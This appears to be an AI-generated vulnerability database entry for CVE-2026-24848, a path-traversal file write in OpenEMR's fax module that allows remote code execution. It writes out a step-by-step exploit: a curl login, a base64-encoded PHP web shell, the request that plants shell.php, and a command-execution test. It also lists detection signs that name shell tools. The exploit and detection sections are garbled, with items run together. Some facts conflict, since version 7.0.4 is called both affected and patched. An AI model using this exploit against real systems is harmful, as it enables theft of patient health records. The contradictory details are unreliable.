
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-24848 is an arbitrary file write vulnerability in OpenEMR's disposeDocument() method within EtherFaxActions.php that allows authenticated users to write arbitrary content to arbitrary filesystem locations, enabling Remote Code Execution (RCE) via malicious PHP web shells. It affects OpenEMR versions 7.0.4 and earlier. The vulnerability was discovered on November 22, 2025, and publicly disclosed on March 3, 2026. It carries a CVSS v3.1 base score of 9.9 (Critical) per Feedly/NVD data, and 8.8 (Critical) per the GitHub security advisory (GitHub Advisory, Red Hat CVE).
The root cause is a path traversal vulnerability (CWE-22) in the disposeDocument() method located in interface/modules/custom_modules/oe-module-faxsms/src/Controller/EtherFaxActions.php (lines 564–597). The method accepts a user-controlled file_path parameter and a base64-encoded content parameter without any path validation, file type restriction, content inspection, or authentication check beyond a basic session. When action=setup is supplied, the decoded content is written directly to the attacker-specified path via file_put_contents(), allowing placement of a PHP web shell anywhere on the filesystem accessible to the web server process. Exploitation requires only a valid OpenEMR account (any privilege level) and that the EtherFax fax provider module be enabled (GitHub Advisory).
Successful exploitation grants an authenticated attacker full Remote Code Execution as the web server user (e.g., apache), enabling complete system compromise. Attackers can exfiltrate all patient electronic health records (EHR) and PHI/PII, dump the database, install persistent backdoors, modify application code, deploy ransomware, and pivot laterally to internal database servers and other networked systems. The breach carries severe compliance consequences including HIPAA and GDPR violations, mandatory breach notifications, and potential financial penalties (GitHub Advisory).
A public proof-of-concept (PoC) exploit script is available in the GitHub security advisory, demonstrating full RCE in a step-by-step automated bash script. The vulnerability was verified and fully exploited by the researcher (tonghuaroot) on November 22, 2025. As of the time of disclosure, there is no confirmed evidence of in-the-wild exploitation. The EPSS score is approximately 0.0023 (low probability of near-term exploitation), and the vulnerability is not currently listed in the CISA KEV catalog (GitHub Advisory, Red Hat CVE).
curl -c cookies.txt -b cookies.txt "http://<target>/interface/main/main_screen.php?auth=login&site=default" -d "new_login_session_management=1" -d "authUser=lowprivuser" -d "clearPass=password" -d "languageChoice=1"ENCODED=$(echo -n '<?php system($_GET["cmd"]); ?>' | base64)file_path and the encoded shell as content: curl -b cookies.txt "http://<target>/interface/modules/custom_modules/oe-module-faxsms/index.php?type=fax&_ACTION_COMMAND=disposeDocument&file_path=/var/www/localhost/htdocs/openemr/shell.php&action=setup&content=$ENCODED" — a successful response returns {"success":true,...}curl "http://<target>/shell.php?cmd=id" — returns output such as uid=1000(apache) gid=101(apache)/interface/modules/custom_modules/oe-module-faxsms/index.php with parameters _ACTION_COMMAND=disposeDocument, action=setup, and file_path containing .php extensions or path traversal sequences; outbound connections from the web server to unknown external IPs (potential reverse shell activity)..php files in the OpenEMR web root or subdirectories not matching normal application filenames (e.g., shell.php, backdoor.php, pwned.php); files with PHP code (<?php) in non-standard locations; recently modified files detectable via find /var/www -name "*.php" -mtime -1.oe-module-faxsms/index.php with action=setup and file_path=...*.php; Apache error log entries showing PHP execution from unexpected file paths; repeated authentication attempts from a single IP followed by disposeDocument calls./bin/bash, nc, ncat, curl, wget); unexpected network listeners on non-standard ports (GitHub Advisory).Update OpenEMR to version 7.0.4 (patched release) immediately, as the patch adds authentication checks, path validation restricted to allowed directories, file extension whitelisting (pdf, tif, tiff, txt), and PHP content detection (GitHub Advisory). If immediate patching is not possible, disable the EtherFax/FaxSMS module by setting $GLOBALS['oefax_enable_fax'] = 0 in global configuration, or block access to the module path at the web server level using Apache .htaccess (<LocationMatch "oe-module-faxsms"> Require all denied </LocationMatch>) or firewall rules. Additionally, audit the filesystem for unexpected PHP files (find /var/www -name "*.php" -mtime -1) and review Apache access logs for signs of prior exploitation targeting the disposeDocument endpoint.
The vulnerability was responsibly disclosed by researcher tonghuaroot and published via GitHub's security advisory system on March 3, 2026. Red Hat tracked the advisory under their CVE database. Social media activity was observed on Bluesky (via CVE tracking accounts) shortly after disclosure. No major vendor statements beyond the OpenEMR project's own advisory or significant independent researcher commentary have been identified at this time (GitHub Advisory, Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."